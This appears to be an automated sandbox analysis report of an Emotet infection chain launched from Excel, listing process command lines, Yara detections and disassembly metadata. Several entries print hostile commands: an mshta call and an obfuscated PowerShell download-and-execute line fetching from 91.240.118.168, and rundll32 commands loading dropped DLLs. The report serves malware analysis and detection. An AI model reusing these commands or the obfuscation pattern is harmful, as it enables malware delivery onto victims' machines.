                                                                                                                    Start time:21:24:16
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13fdf0000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:24:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x4a730000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:24:19
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x13ff00000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:24:22
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13fbc0000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:24:34
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x4a860000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:21:24:34
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:24:38
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:11
                                                                                                                    Start time:21:25:02
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:25:06
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:25:28
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:15
                                                                                                                    Start time:21:25:33
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:16
                                                                                                                    Start time:21:25:50
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:17
                                                                                                                    Start time:21:25:55
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Executed Functions

                                                                                                                      Function 033A1CD7 Relevance: .4, Instructions: 430COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414750441.00000000033A1000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.414716936.00000000033A0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 441f7fb5f3daf9b1b3edaae66f60cdc0f438d531604e32df216e38cd348c8f44
                                                                                                                      • Instruction ID: c77404973b80daa5633b43b295b47dd926e1ed757bf6a16451311b78d4a72f29
                                                                                                                      • Opcode Fuzzy Hash: 441f7fb5f3daf9b1b3edaae66f60cdc0f438d531604e32df216e38cd348c8f44
                                                                                                                      • Instruction Fuzzy Hash: BED1F63061CE894FDB59DB2C8494A21BBE2FB5D344B1849EEE49ECB2A3D624CCC1C755
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 033A1CD7 Relevance: .4, Instructions: 430COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414750441.00000000033A1000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 441f7fb5f3daf9b1b3edaae66f60cdc0f438d531604e32df216e38cd348c8f44
                                                                                                                      • Instruction ID: c77404973b80daa5633b43b295b47dd926e1ed757bf6a16451311b78d4a72f29
                                                                                                                      • Opcode Fuzzy Hash: 441f7fb5f3daf9b1b3edaae66f60cdc0f438d531604e32df216e38cd348c8f44
                                                                                                                      • Instruction Fuzzy Hash: BED1F63061CE894FDB59DB2C8494A21BBE2FB5D344B1849EEE49ECB2A3D624CCC1C755
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 033A3121 Relevance: .2, Instructions: 227COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414732609.00000000033A3000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.414716936.00000000033A0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6f1cb45b3f42fb340094006eb705e2448311a71574ab38d984e04d1f927b07a0
                                                                                                                      • Instruction ID: 6f9a37fc64bde4e95d6d85e8b45acc8c6a0208e9c934cdc5fe29f42dc368b78c
                                                                                                                      • Opcode Fuzzy Hash: 6f1cb45b3f42fb340094006eb705e2448311a71574ab38d984e04d1f927b07a0
                                                                                                                      • Instruction Fuzzy Hash: 6451D52471CE484FCB49EF1C8899A31B7E1FB5D310B4985EEE44BC72A2DA24CC918795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 033A3121 Relevance: .2, Instructions: 227COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414732609.00000000033A3000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A3000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6f1cb45b3f42fb340094006eb705e2448311a71574ab38d984e04d1f927b07a0
                                                                                                                      • Instruction ID: 6f9a37fc64bde4e95d6d85e8b45acc8c6a0208e9c934cdc5fe29f42dc368b78c
                                                                                                                      • Opcode Fuzzy Hash: 6f1cb45b3f42fb340094006eb705e2448311a71574ab38d984e04d1f927b07a0
                                                                                                                      • Instruction Fuzzy Hash: 6451D52471CE484FCB49EF1C8899A31B7E1FB5D310B4985EEE44BC72A2DA24CC918795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 033A3317 Relevance: .0, Instructions: 15COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414732609.00000000033A3000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.414716936.00000000033A0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction ID: 36d81037a0c918aa953a939c86cac6adfacf82f9f2a3bd65559d96b6155daffb
                                                                                                                      • Opcode Fuzzy Hash: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction Fuzzy Hash: F4D0A9255097C40FC302B378044A12CBA518B01288B2800CF84868B182DD0A4D848212
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 033A3317 Relevance: .0, Instructions: 15COMMON
